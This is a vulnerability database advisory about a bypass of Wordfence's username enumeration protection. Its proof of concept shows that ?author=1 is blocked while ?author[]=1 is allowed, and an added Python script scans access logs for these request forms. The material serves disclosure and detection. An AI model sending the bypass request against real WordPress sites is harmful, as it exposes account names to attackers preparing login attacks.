Wordfence <= 7.1.12 - Username Enumeration Prevention Bypass



Proof of Concept
Wordfence blocks:

http://www.example.com/?author=1

But allows:

http://www.example.com/?author[]=1
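
For defenders reviewing access logs, the following added example (not part of the original advisory and not Wordfence code) flags requests that carry the author parameter in either the plain or the bracketed form shown above, including the percent-encoded spelling of the brackets. The log format, the sample lines and the function names are assumptions made for illustration.

```python
import re
from urllib.parse import unquote_plus

# Client address and request target from a combined-format access log line.
REQUEST = re.compile(r'^(\S+) .*?"(?:GET|HEAD|POST) (\S+) HTTP/[\d.]+"')
# "author" alone, or followed by bracket groups: author[], author[0], author[][]
AUTHOR = re.compile(r"^author((?:\[[^\]]*\])*)$")

def author_form(target):
    """Return 'scalar', 'array' or None for the author parameter in a request target."""
    query = target.partition("?")[2].partition("#")[0]
    found = None
    for pair in query.split("&"):
        name = unquote_plus(pair.partition("=")[0])  # decode %5B%5D before matching
        m = AUTHOR.match(name)
        if m:
            if m.group(1):
                return "array"   # bracketed form: the one the advisory shows being allowed
            found = "scalar"     # plain form: the one the advisory shows being blocked
    return found

def scan(lines):
    """Return (client, form, target) for every request carrying an author parameter."""
    hits = []
    for line in lines:
        m = REQUEST.match(line)
        if not m:
            continue
        form = author_form(m.group(2))
        if form:
            hits.append((m.group(1), form, m.group(2)))
    return hits

# Constructed sample log lines (documentation IP ranges, made-up status codes).
SAMPLE = [
    '203.0.113.5 - - [02/Oct/2018:10:00:01 +0000] "GET /?author=1 HTTP/1.1" 403 512',
    '203.0.113.5 - - [02/Oct/2018:10:00:02 +0000] "GET /?author[]=1 HTTP/1.1" 200 2048',
    '203.0.113.5 - - [02/Oct/2018:10:00:03 +0000] "GET /?author%5B%5D=2 HTTP/1.1" 200 2048',
    '198.51.100.7 - - [02/Oct/2018:10:05:00 +0000] "GET /?s=author HTTP/1.1" 200 1024',
    '198.51.100.7 - - [02/Oct/2018:10:05:01 +0000] "GET /?coauthor=1 HTTP/1.1" 200 1024',
]

if __name__ == "__main__":
    for client, form, target in scan(SAMPLE):
        print(f"{client}  {form:6}  {target}")
```

A filter or detection rule that matches only the literal string author= misses the second and third sample lines, which is why the parameter name is decoded and normalised before matching.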

Affects Plugin

References

PacketStorm: 149845
URL: http://www.waraxe.us/advisory-109.html

Classification

Type: BYPASS

Miscellaneous

Original Researcher: Janek Vind "waraxe"
Submitter: Ryan Dewhurst
Submitter Website: https://dewhurstsecurity.com/
Submitter Twitter: ethicalhack3r
Views: 17313
Verified: Yes
WPVDB ID: 9135

Timeline

Publicly Published: 2018-10-02 (almost 2 years ago)
Added: 2018-10-18 (over 1 year ago)
Last Updated: 2019-11-01 (8 months ago)
